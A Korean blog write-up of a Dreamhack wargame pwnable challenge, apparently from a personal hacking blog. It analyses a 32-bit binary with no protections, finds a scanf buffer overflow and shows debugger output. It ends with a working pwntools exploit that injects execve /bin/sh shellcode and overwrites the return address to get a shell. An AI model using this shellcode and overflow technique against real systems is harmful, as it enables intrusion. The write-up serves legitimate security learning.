728x90
반응형
문제 : https://dreamhack.io/wargame/challenges/2
Environment
Ubuntu 16.04
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
- 32bit 바이너리 : 주소가 4byte 단위
- little endian
- no canary : Buffer Overflow 공격 가능
- nx bit 없음 : shellcode 삽입 가능
- no pie : 주소가 그대로
> 어떠한 보호 기법도 적용되지 않음
Code Analysis
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
int main(int argc, char *argv[]) {
char buf[0x80];
initialize();
printf("buf = (%p)\n", buf);
scanf("%141s", buf);
return 0;
}
> basic_exploitation_000.c
buf[0x80] : 128 byte 할당
scanf : 141byte 만큼 입력받아 buf에 저장
▶ 141byte ≥ 128byte 지정된 버퍼 크기보다 입력 값을 더 많이 줄 수 있음 > buffer overflow 발생
Trigger
> buf의 주소가 계속 변경됨 : ASLR이 걸려있음
> buffer overflow 발생
Stack Frame
pwndbg> disass main
Dump of assembler code for function main:
=> 0x080485d9 <+0>: push ebp
0x080485da <+1>: mov ebp,esp
0x080485dc <+3>: add esp,0xffffff80
0x080485df <+6>: call 0x8048592 <initialize>
0x080485e4 <+11>: lea eax,[ebp-0x80]
0x080485e7 <+14>: push eax
0x080485e8 <+15>: push 0x8048699
0x080485ed <+20>: call 0x80483f0 <printf@plt>
0x080485f2 <+25>: add esp,0x8
0x080485f5 <+28>: lea eax,[ebp-0x80]
0x080485f8 <+31>: push eax
0x080485f9 <+32>: push 0x80486a5
0x080485fe <+37>: call 0x8048460 <__isoc99_scanf@plt>
0x08048603 <+42>: add esp,0x8
0x08048606 <+45>: mov eax,0x0
0x0804860b <+50>: leave
0x0804860c <+51>: ret
End of assembler dump.
> main함수
- buffer + sfp + ret > 132byte
Breakpoint 1, 0x080485d9 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*EAX 0x80485d9 (main) ◂— push ebp
*EBX 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
*ECX 0x94609599
*EDX 0xffffd110 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
*EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
*ESI 0xffffd1a4 —▸ 0xffffd373 ◂— '/home/minzu/basic_exploitation_000'
*EBP 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 ◂— 0x0
*ESP 0xffffd0ec —▸ 0xf7c21519 (__libc_start_call_main+121) ◂— add esp, 0x10
*EIP 0x80485d9 (main) ◂— push ebp
───────────────────────[ DISASM / i386 / set emulate on ]───────────────────────
► 0x80485d9 <main> push ebp <_rtld_global>
0x80485da <main+1> mov ebp, esp
0x80485dc <main+3> add esp, -0x80
0x80485df <main+6> call initialize <initialize>
0x80485e4 <main+11> lea eax, [ebp - 0x80]
0x80485e7 <main+14> push eax
0x80485e8 <main+15> push 0x8048699
0x80485ed <main+20> call printf@plt <printf@plt>
0x80485f2 <main+25> add esp, 8
0x80485f5 <main+28> lea eax, [ebp - 0x80]
0x80485f8 <main+31> push eax
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ esp 0xffffd0ec —▸ 0xf7c21519 (__libc_start_call_main+121) ◂— add esp, 0x10
01:0004│ 0xffffd0f0 ◂— 0x1
02:0008│ 0xffffd0f4 —▸ 0xffffd1a4 —▸ 0xffffd373 ◂— '/home/minzu/basic_exploitation_000'
03:000c│ 0xffffd0f8 —▸ 0xffffd1ac —▸ 0xffffd396 ◂— 'SHELL=/bin/bash'
04:0010│ 0xffffd0fc —▸ 0xffffd110 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
05:0014│ 0xffffd100 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
06:0018│ 0xffffd104 —▸ 0x80485d9 (main) ◂— push ebp
07:001c│ 0xffffd108 ◂— 0x1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► 0 0x80485d9 main
1 0xf7c21519 __libc_start_call_main+121
2 0xf7c215f3 __libc_start_main+147
3 0x80484a1 _start+33
────────────────────────────────────────────────────────────────────────────────
Exploit Scenario
shellcode + dummy (132 - shellcode_bytes) + buffer 주소 (실시간으로 받아야함)
Exploit
from pwn import *
p = remote('호스트',포트번호)
context.arch = "i386" # 32bit
p.recvuntil("buf = (")
buf_addr = int(p.recv(10),16) # buf의 위치
payload = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
#쉘코드
payload += b"\x80" * (132-26)
payload += p32(buf_addr)
p.sendline(payload)
p.interactive()
728x90
반응형
'Hacking > Wargame' 카테고리의 다른 글
[Pwnable] basic_exploitation_001 (0) | 2024.04.03 |
---|---|
[Cryptography] Textbook-RSA (1) | 2024.02.13 |
[Cryptography] Textbook-DH (1) | 2024.02.13 |
[Pwnable] Return Address Overwrite (0) | 2024.02.07 |
[Pwnable] Shell_basic (1) | 2024.01.28 |